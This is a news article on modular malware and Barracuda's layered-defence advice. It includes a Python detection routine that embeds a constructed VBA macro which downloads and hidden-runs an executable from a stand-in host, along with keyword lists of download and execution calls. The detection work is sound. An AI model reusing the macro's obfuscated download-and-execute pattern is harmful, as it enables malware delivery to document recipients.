How to protect your organization against modular malware

Modular malware attacks have surged since the start of 2019, according to Barracuda Networks.


Modular malware represents a sophisticated type of attack that launches in stages and adapts itself by analyzing the target's environment and defenses. Since the beginning of the year, the use of modular malware has surged, with more than 150,000 unique malicious files detected by Barracuda Networks. In a Thursday report, the security provider offers advice on how organizations can protect themselves against this type of threat.

What makes modular malware more dangerous than "conventional" malware? Most malware is sent as spam with attached documents and files, using email distribution lists found on the dark web. If a user opens the infected file or document, the malware is automatically installed or runs a script to download and install it from an external source.

Modular malware works differently in that it sends a basic initial payload just to establish itself. The job of this payload is to gather information about the target's system. After this initial connection is made, the malware signals a command and control center to download additional payloads, which are chosen based on the information obtained about the system, such as what type of security defenses are in place. As a result, modular malware can selectively launch different payloads and functionality based on the target and the goal behind the attack.

Modular malware has commonly been used in banking trojans, including Emotet, TrickBot, and CoreBot, as well as in infostealers such as LokiBot and Pony.

Combatting modular malware requires a multi-layered defense strategy, one that relies on technology and education. To protect and defend your organization against these types of attacks, Barracuda offers the following recommendations:

1. Gateway defense

Organizations should establish advanced inbound and outbound security techniques, including malware detection, spam filters, firewalls, and sandboxing.

To detect emails with malicious documents, static and dynamic analysis should be used to determine if the attached document is trying to download and run an executable file, something no document should be doing in the first place. The URL for the executable file can be flagged by using heuristics or threat intelligence systems, said Barracuda. Static analysis can also be used to detect obfuscated code as a tipoff for suspicious files.
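As an added illustration of the static checks described above (example code written for this article, not Barracuda's tooling), here is a small Python triage routine that flags extracted macro text when it both downloads and executes a file, recovers URLs hidden behind Chr() concatenation, and treats that obfuscation itself as a tip-off. The macro text is a constructed, inert sample.

```python
import re

# Constructed sample of macro source extracted from a document (not a real sample):
# it downloads an executable, runs it, and hides the URL scheme with Chr() concatenation.
SAMPLE_MACRO = """
Sub AutoOpen()
    Dim u As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & "://example.invalid/update.exe"
    URLDownloadToFile 0, u, Environ("TEMP") & "\\update.exe", 0, 0
    Shell Environ("TEMP") & "\\update.exe", vbHide
End Sub
"""

# Constructed benign macro: formatting only, no network or execution calls.
BENIGN_MACRO = """
Sub FormatReport()
    ActiveSheet.Range("A1:D20").Font.Bold = True
End Sub
"""

# Keywords indicating network download or process execution in VBA.
DOWNLOAD_KEYWORDS = ("URLDownloadToFile", "XMLHTTP", "WinHttpRequest", "DownloadFile")
EXECUTE_KEYWORDS = ("Shell", "WScript.Shell", "CreateObject", "powershell")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
EXE_RE = re.compile(r"\.(exe|dll|scr|ps1)\b", re.IGNORECASE)
CHR_RE = re.compile(r"\bChr\s*\(\s*(\d+)\s*\)")

def _has_keyword(source: str, keywords) -> bool:
    return any(re.search(r"\b" + re.escape(k) + r"\b", source, re.I) for k in keywords)

def deobfuscate(source: str) -> str:
    """Replace Chr(n) with the quoted character and join adjacent string literals."""
    s = CHR_RE.sub(lambda m: '"' + chr(int(m.group(1))) + '"', source)
    return re.sub(r'"\s*&\s*"', "", s)

def analyze_macro(source: str) -> dict:
    """Static triage of macro text; returns the indicators found and a verdict."""
    chr_calls = len(CHR_RE.findall(source))
    plain = deobfuscate(source)
    indicators = {
        "download": _has_keyword(plain, DOWNLOAD_KEYWORDS),
        "execute": _has_keyword(plain, EXECUTE_KEYWORDS),
        "executable_reference": bool(EXE_RE.search(plain)),
        "obfuscated_strings": chr_calls >= 3,   # chained Chr() rebuilding a string
        "urls": URL_RE.findall(plain),          # URLs visible only after decoding
    }
    # A document that both fetches and runs something is suspicious on its own.
    suspicious = (indicators["download"] and indicators["execute"]) or indicators["obfuscated_strings"]
    indicators["verdict"] = "suspicious" if suspicious else "clean"
    return indicators
```

In practice the recovered URL would be passed to the heuristics or threat-intelligence lookup the text mentions, and the verdict used to route the attachment to sandboxing rather than the inbox.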

Further, spam filters and related security software can look for subtle clues even in malicious emails that look legitimate. Here, the goal is to prevent such emails from ever reaching the user's inbox. In the event a user opens a malicious file attachment or clicks a link to download malware, an advanced firewall should be in place to try to stop the attack by blocking the executable file as it comes through.

File encryption and DLP (data loss prevention) can also help guard against the loss of critical data. Email archiving is another suggested practice for both compliance and business continuity.

2. Resiliency

Make sure you have a backup strategy to help you recover from lost or deleted files. Further, an email continuity process ensures that important emails can be sent even during an outage.

3. Fraud protection

Use artificial intelligence to prevent attacks that get past your email gateway. AI can be used to protect against spearphishing attacks. DMARC (Domain-based Message Authentication, Reporting & Conformance) validation can detect and stop email and domain spoofing.

4. Human firewall

The top layer of email defense is the most important—education. Include phishing simulation as part of the security awareness training you provide to your users. Make sure users are aware of these new types of attacks. Show them how to identify potential threats. Test the effectiveness of in-the-moment training and evaluate the users most vulnerable to attacks.


By Lance Whitney

Lance Whitney is a freelance technology writer and trainer and a former IT professional. He's written for Time, CNET, PCMag, and several other publications. He's the author of two tech books—one on Windows and another on LinkedIn.